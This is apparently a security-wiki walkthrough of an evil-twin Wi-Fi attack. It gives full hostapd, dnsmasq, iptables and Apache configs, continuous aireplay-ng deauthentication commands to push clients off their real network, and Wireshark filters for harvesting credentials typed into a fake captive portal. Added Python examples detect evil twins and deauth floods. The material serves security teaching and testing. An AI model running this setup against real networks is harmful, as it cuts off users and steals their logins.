# Evil-Twin Attack

{% hint style="danger" %}
This is for educational purposes and only to be performed on networks you have permission to test.
{% endhint %}

Basic info on Wireless can be found [here](broken://pages/qn5h5KMv9pZnd7ZieX2Z).\
\
This will be a walkthrough on performing an [Evil Twin wireless attack](https://www.varonis.com/blog/evil-twin-attack) with [Captive Portals](https://www.linksys.com/what-is-a-captive-portal.html).

An evil twin is a fake wireless access point (AP) that looks like a real one: a malicious wireless network set up with the same SSID as the target.

A WiFi adapter that supports monitor mode and packet injection is not required for the evil twin itself, but it is required if we want to kick clients off their network so they connect to ours.

## Hardware

I myself have and recommend these adapters:

* [Alfa AWUS036ACM](https://www.amazon.com/Alfa-AWUS036ACM-Long-Range-Dual-Band-Wireless/dp/B073X6RL9D) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACHM](https://www.amazon.com/gp/product/B08SJBV1N3/ref=ox_sc_act_title_1?smid=A20G3A026MV70R\&psc=1) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACH](https://www.amazon.com/dp/B08SJC78FH?ref_=cm_sw_r_cp_ud_dp_PSZZG6J9X0XH40GXB685) <-- Capable of 2.4GHz and 5GHz (This more than likely \*will\* require driver installation)
* [Panda Wireless PAU09 N600](https://www.amazon.com/Panda-Wireless-PAU09-Adapter-Antennas/dp/B01LY35HGO) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036NEH](https://www.amazon.com/AWUS036NEH-Range-WIRELESS-802-11b-USBAdapter/dp/B0035OCVO6)
* [Alfa AWUS036NH](https://www.amazon.com/Alfa-AWUS036NH-802-11g-Wireless-Long-Range/dp/B003YIFHJY)
* [Panda Wireless PAU05](https://www.amazon.com/Panda-300Mbps-Wireless-USB-Adapter/dp/B00EQT0YK2)
* [TP-Link TL-WN722N](https://www.amazon.com/TP-Link-TL-WN722N-Wireless-network-Adapter/dp/B002SZEOLG)
* [Ralink USB WiFi RT5370](https://www.amazon.com/Ralink-RT5370-Raspberry-Adapter-Function/dp/B019XUDHFC)

You can also use a device such as [WiFi Pineapple](https://shop.hak5.org/products/wifi-pineapple). This primarily works on open networks.

First we install the prerequisites:

```
sudo apt install -y dnsmasq hostapd aircrack-ng
```

## Finding target

First we find our target; I will target "Open-WiFi" in this example. We use airodump-ng for this:

```
sudo airodump-ng (interface)
```

<figure><img src="/files/vVuXuvjxhs6eFAIud9WH" alt=""><figcaption></figcaption></figure>

Kill processes that may interfere:

```
sudo airmon-ng check kill
```

<figure><img src="/files/KZgBXjZNF6wm7MVw5w9u" alt=""><figcaption></figcaption></figure>

Now put the interface into monitor mode if we're going to deauthenticate clients. Note that airmon-ng usually renames the interface (for example `wlan0` becomes `wlan0mon`); use that name in the aireplay-ng commands later on.

```
sudo airmon-ng start (interface)
```

<figure><img src="/files/DmbZBKhzM9EHxOScJQ4K" alt=""><figcaption></figcaption></figure>
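From the defender's side, the same airodump-ng scan that finds a target is what reveals an evil twin: one ESSID advertised by a second BSSID, typically open where the real network is WPA2 (which is exactly what the hostapd.conf on this page produces). The following is an added example, not code from the original page; it parses the AP table that airodump-ng writes with `-w <prefix>` (the `<prefix>-01.csv` file) and reports such duplicates. The CSV text is constructed for the example, not a real capture.

```python
"""Flag evil-twin candidates in airodump-ng CSV output (added example, not from the page)."""
import csv
import io
from collections import defaultdict

# Constructed sample in the AP-table layout airodump-ng writes with -w <prefix>
# (<prefix>-01.csv); not a real capture. A blank line ends the AP table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -60, 120, 0, 0.  0.  0.  0,  9, Open-WiFi,
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -70,  90, 0, 0.  0.  0.  0,  7, HomeNet,
DE:AD:BE:EF:00:01, 2024-01-01 10:03:00, 2024-01-01 10:05:00,  6,  54, OPN, , , -40,  40, 0, 0.  0.  0.  0,  9, Open-WiFi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_access_points(text):
    """Return one dict per row of the AP table (everything before the blank line)."""
    ap_lines = []
    for line in text.splitlines():
        if not line.strip():
            break  # blank line separates the AP table from the station table
        ap_lines.append(line)
    reader = csv.reader(io.StringIO("\n".join(ap_lines)), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [dict(zip(header, (c.strip() for c in row)))
            for row in reader if len(row) >= len(header) - 1]


def find_evil_twin_candidates(aps):
    """Report ESSIDs advertised by more than one BSSID and why they look suspicious."""
    by_essid = defaultdict(list)
    for ap in aps:
        if ap.get("ESSID"):  # skip hidden networks (empty ESSID)
            by_essid[ap["ESSID"]].append(ap)
    findings = []
    for essid, rows in by_essid.items():
        if len(rows) < 2:
            continue
        privacy = sorted({r["Privacy"] for r in rows})
        channels = sorted({r["channel"] for r in rows})
        reasons = []
        if len(privacy) > 1:  # open twin of a protected network: strongest tell
            reasons.append("security mismatch: " + "/".join(privacy))
        if len(channels) > 1:
            reasons.append("channel mismatch: " + "/".join(channels))
        if not reasons:  # could be a legitimate multi-AP network; flag softly
            reasons.append("same ESSID on several BSSIDs (verify it is one managed network)")
        findings.append({"essid": essid, "bssids": sorted(r["BSSID"] for r in rows), "reasons": reasons})
    return findings
```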

## Setup AP

Create a `dnsmasq.conf` file:

```
# Set the wifi interface dnsmasq listens on (the AP interface)
interface=(interface)

# Set the IP range, netmask and lease time handed to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

# Set the gateway IP address (DHCP option 3 = router)
dhcp-option=3,10.0.0.1

# Set DNS server address (DHCP option 6 = DNS)
dhcp-option=6,10.0.0.1

# Upstream DNS server for names not answered locally
server=8.8.8.8

# logs
log-queries
log-dhcp

# Redirect all DNS requests to 10.0.0.1 (# matches every domain)
#address=/#/10.0.0.1

# Redirect only google to 10.0.0.1
#address=/google.com/10.0.0.1
#address=/www.google.com/10.0.0.1
#address=/google.com/www.google.com/10.0.0.1
```

<figure><img src="/files/LuOT5RZdqT24216kfbmq" alt=""><figcaption></figcaption></figure>

Note that the redirect lines are commented out. If we uncomment `#address=/#/10.0.0.1`, clients will connect but will not get internet access, because the pound sign (`#`) is a wildcard in dnsmasq that matches every domain. Every name then resolves to 10.0.0.1, so clients connect to the AP and are immediately asked to sign in on the Evil Portal that is set up.

Alternatively, we can redirect only specific websites back to our Evil Portal, as the google.com lines show.

Create `hostapd.conf` and fill in the target's info:

```
interface=(interface)
driver=nl80211
ssid=(Target AP)
hw_mode=g
channel=(Target channel)
macaddr_acl=0
ignore_broadcast_ssid=0
```

<figure><img src="/files/HaDKgl5c8CILH21f0VPa" alt=""><figcaption></figcaption></figure>

Assign the interface the gateway IP and netmask:

```
sudo ifconfig (interface) up 10.0.0.1 netmask 255.255.255.0
```

Add the route:

```
sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
```

Set up a small script for the iptables rules:

```
#!/bin/bash
# Flush existing rules, then NAT everything leaving via the internet interface
sudo iptables --flush
sudo iptables --table nat --append POSTROUTING --out-interface (internet interface) -j MASQUERADE
# Allow forwarding of traffic arriving from the AP (wireless) interface
sudo iptables --append FORWARD --in-interface (wireless interface) -j ACCEPT
sudo iptables -t nat -A POSTROUTING -j MASQUERADE
# Enable IPv4 forwarding. "sudo echo 1 > file" fails when the shell doing the
# redirect is not root, so write through tee instead.
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
```

<figure><img src="/files/vGVXz60BMrQsDBZnH1qj" alt=""><figcaption></figcaption></figure>

I named mine IP-Tables.sh. Make it executable and run it:

```
chmod +x IP-Tables.sh
sudo ./IP-Tables.sh
```

If you want the AP set up without a captive portal, just run dnsmasq and hostapd.

Start dnsmasq with:

```
sudo dnsmasq -C (path/to/dnsmasq.conf)
```

Start hostapd with:

```
sudo hostapd (path/to/hostapd.conf)
```

We can add `-B` at the end to run hostapd in the background, but then we won't see when a client connects:

```
sudo hostapd (path/to/hostapd.conf) -B
```

### Captive Portals

Put your captive portal files in the `/var/www/html/` directory.

[Example Portals here](https://github.com/Th4ntis/Evil-Portals.git)

Edit `/etc/apache2/sites-enabled/000-default.conf` and add the following to the end (the rules need Apache's rewrite module, mod_rewrite, to be enabled):

```
sudo nano /etc/apache2/sites-enabled/000-default.conf
```

```
<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>
```

<figure><img src="/files/qprPd1U3YiPCUtNhTICe" alt=""><figcaption></figcaption></figure>

Start the web server:

```
sudo service apache2 start
```

Start dnsmasq with:

```
sudo dnsmasq -C (path/to/dnsmasq.conf)
```

Start the hostapd AP with:

```
sudo hostapd (path/to/hostapd.conf)
```

We can add `-B` at the end to run hostapd in the background, but then we won't see when a client connects:

```
sudo hostapd (path/to/hostapd.conf) -B
```

<figure><img src="/files/CfsD7MFG6BkKCyVF3RKC" alt=""><figcaption></figcaption></figure>

Once we're ready, we can disconnect clients from their network so they connect to ours, using aireplay-ng on the monitor-mode interface:

```
sudo aireplay-ng -0 0 -a (BSSID) (interface)
```

Or, to deauth a specific client:

```
sudo aireplay-ng -0 0 -a (bssid) -c (Client MAC Address) (interface)
```

The `-0 0` sends deauth packets continuously until stopped; change it to `-0 10` to send just 10 deauth packets.

<figure><img src="/files/KBhJGxtpBYfeb7CDEb9c" alt=""><figcaption></figcaption></figure>
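The defender-side counterpart to the continuous `-0 0` deauth above, as an added example that is not part of the original page: it reads tshark's field export of deauthentication frames and alerts when one BSSID sends more than a threshold of deauths inside a sliding time window, which is how a broadcast deauth flood shows up to a wireless IDS. The export command in the comment is an assumption (the field names are real tshark fields), and the sample lines are constructed, not a real capture.

```python
"""Detect deauthentication floods from tshark field output (added example, not from the page)."""
from collections import defaultdict, deque

# Assumed export command (field names are real tshark fields; type_subtype 12 = deauth):
#   tshark -r capture.pcap -Y "wlan.fc.type_subtype == 12" -T fields \
#          -e frame.time_epoch -e wlan.bssid -e wlan.da -e wlan.fixed.reason_code
# The tab-separated lines below are constructed for the example, not a real capture.
SAMPLE_TSHARK = """\
1700000000.000\tAA:BB:CC:00:00:01\tFF:FF:FF:FF:FF:FF\t7
1700000000.050\tAA:BB:CC:00:00:01\tFF:FF:FF:FF:FF:FF\t7
1700000000.100\tAA:BB:CC:00:00:01\tFF:FF:FF:FF:FF:FF\t7
1700000000.150\tAA:BB:CC:00:00:01\tFF:FF:FF:FF:FF:FF\t7
1700000000.200\tAA:BB:CC:00:00:01\tFF:FF:FF:FF:FF:FF\t7
1700000000.250\tAA:BB:CC:00:00:01\tFF:FF:FF:FF:FF:FF\t7
1700000003.000\t11:22:33:44:55:66\t66:55:44:33:22:11\t3
"""

BROADCAST = "FF:FF:FF:FF:FF:FF"


def parse_tshark_lines(text):
    """Return (timestamp, bssid, destination, reason_code) tuples, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, bssid, dst, reason = line.split("\t")
        events.append((float(ts), bssid.upper(), dst.upper(), int(reason)))
    return events


def detect_deauth_floods(events, window=1.0, threshold=5):
    """Per BSSID, keep the deauth timestamps inside the last `window` seconds.

    The first time a BSSID has `threshold` or more deauths in the window, record
    an alert with the count, whether the frames were broadcast (every client
    kicked at once) and the reason code seen on the triggering frame.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, bssid, dst, reason in sorted(events):
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()  # drop frames that fell out of the window
        if len(q) >= threshold and bssid not in alerts:
            alerts[bssid] = {"at": ts, "count": len(q),
                             "broadcast": dst == BROADCAST, "reason": reason}
    return alerts
```

A single deauth to one client (the last sample line, reason code 3, a station leaving) never reaches the threshold, which is the point of counting per window rather than alerting on every deauth frame.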

## Post connection

Once they are connected, or even before, we can start intercepting traffic with whatever tools we want, like [Wireshark](broken://pages/nXzTB6Vpwku2XX1R92Yl), [tshark](https://www.wireshark.org/docs/man-pages/tshark.html), [tcpdump](https://www.tcpdump.org/), etc. In this case I'll use wireshark on `wlan0`, the interface I was broadcasting from.

<figure><img src="/files/DI7sJUe3OiefjKBVwsIY" alt=""><figcaption></figcaption></figure>

When the user tries to open any page, they are redirected to the login portal; any username/password they enter there is captured.

Look for the `HTTP POST` request, then expand HTML Form URL Encoded to see the submitted credentials.

<figure><img src="/files/uvy5O1FKZaBdmRXkUEou" alt=""><figcaption></figcaption></figure>

#### Wireshark filters

* `dns and ip.addr==(IP)` to see the sites a client is going to
* `frame contains (word)` searches for a given string in any packet
* `http.request.method=="POST"` shows submitted form data, including login info.
